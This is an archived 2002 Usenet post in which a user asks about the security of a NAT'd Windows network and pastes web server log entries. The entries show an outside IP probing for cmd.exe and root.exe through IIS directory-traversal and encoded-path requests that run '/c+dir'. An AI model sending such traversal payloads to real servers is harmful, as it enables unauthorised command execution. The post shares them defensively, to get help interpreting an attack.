Re: Security Questions

From: Evan Camilleri (evan.nospam@holistic.com.mt)
Date: 09/03/02

• Next message: Andrew Maloney: "Stupid domain password mistake"
• Previous message: Rafael Hernández: "Lock keyboard"
• In reply to: Jeff Cochran: "Re: Security Questions"
• Next in thread: RCC: "Re: Security Questions"
• Reply: RCC: "Re: Security Questions"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: "Evan Camilleri" <evan.nospam@holistic.com.mt>
Date: Tue, 3 Sep 2002 11:11:35 +0200

What's worrying me are the following log entries! (i changed my ip)

2002-09-02 03:37:15 61.144.250.81 - xxx.56.149.243 80 GET /scripts/root.exe
/c+dir 404 -

2002-09-02 03:37:17 61.144.250.81 - xxx.56.149.243 80 GET /MSADC/root.exe
/c+dir 403 -

2002-09-02 03:37:19 61.144.250.81 - xxx.56.149.243 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -

2002-09-02 03:37:21 61.144.250.81 - xxx.56.149.243 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -

2002-09-02 03:37:23 61.144.250.81 - xxx.56.149.243 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -

2002-09-02 03:37:24 61.144.250.81 - xxx.56.149.243 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -

2002-09-02 03:37:25 61.144.250.81 - xxx.56.149.243 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -

2002-09-02 03:37:30 61.144.250.81 - xxx.56.149.243 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
/c+dir 403 -

2002-09-02 03:37:33 61.144.250.81 - xxx.56.149.243 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -

2002-09-02 03:37:34 61.144.250.81 - xxx.56.149.243 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -

2002-09-02 03:37:36 61.144.250.81 - xxx.56.149.243 80 GET
/winnt/system32/cmd.exe /c+dir 404 -

2002-09-02 03:37:38 61.144.250.81 - xxx.56.149.243 80 GET
/winnt/system32/cmd.exe /c+dir 404 -

2002-09-02 03:37:39 61.144.250.81 - xxx.56.149.243 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -

2002-09-02 03:37:41 61.144.250.81 - xxx.56.149.243 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -

2002-09-02 03:37:42 61.144.250.81 - xxx.56.149.243 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -

2002-09-02 03:37:44 61.144.250.81 - xxx.56.149.243 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -

<jcochran at naplesgov dot com (Jeff Cochran)> wrote in message
news:3d787d9c.2466236@news.supernews.com...
> >My network uses NAT. What are my security loopholes?
>
> Most of the same as without NAT. :)
>
> Many attacks don't care what your IP address is, only whether or not
> they can get to a particular servcie you're running. If you have a
> web server, even NAT'd, running on port 80, then any http based attack
> can hit it.
>
> >How can I check if
> >there is a possible attack?
>
> Okay, I'll be a smartass. Check your firewall logs. Since you don't
> have any, you need to check the logs you do have, such as the event
> viewer security log, where you'll see attempts at logging in, since
> you of course are auditing failed logins.
>
> >Can I know who is accessing my system, and what
> >is being accessed?
>
> Maybe. Maybe not.
>
> >How can I disable access to my network for an ip or range of ip?
>
> Easiest way is using your firewall. Otherwise, take a look at the
> Advanced settings on your TCP/IP setup.
>
> Jeff

• Next message: Andrew Maloney: "Stupid domain password mistake"
• Previous message: Rafael Hernández: "Lock keyboard"
• In reply to: Jeff Cochran: "Re: Security Questions"
• Next in thread: RCC: "Re: Security Questions"
• Reply: RCC: "Re: Security Questions"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages Re: Security Questions ... What are my security loopholes? ... >> How can I disable access to my network for an ip or range of ip? ... > NAT is only address translation. ... it could be an attack. ... (microsoft.public.win2000.security) Re: Security Questions ... What are my security loopholes? ... Most of the same as without NAT. ... web server, even NAT'd, running on port 80, then any http based attack ... >How can I disable access to my network for an ip or range of ip? ... (microsoft.public.win2000.security) Re: Security Questions ... What are my security loopholes? ... > How can I disable access to my network for an ip or range of ip? ... NAT is only address translation. ... it could be an attack. ... (microsoft.public.win2000.security) Security Questions ... My network uses NAT. ... What are my security loopholes? ... there is a possible attack? ... How can I disable access to my network for an ip or range of ip? ... (microsoft.public.win2000.security) Re: XP Home: selective folder sharing ... >same would hold for any wireless connection. ... Explaining bridges vs NAT is not easy. ... network are visible to all other components on each network. ... With a bridge (if Falcon-II is providing one), ... (microsoft.public.windowsxp.network_web)

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint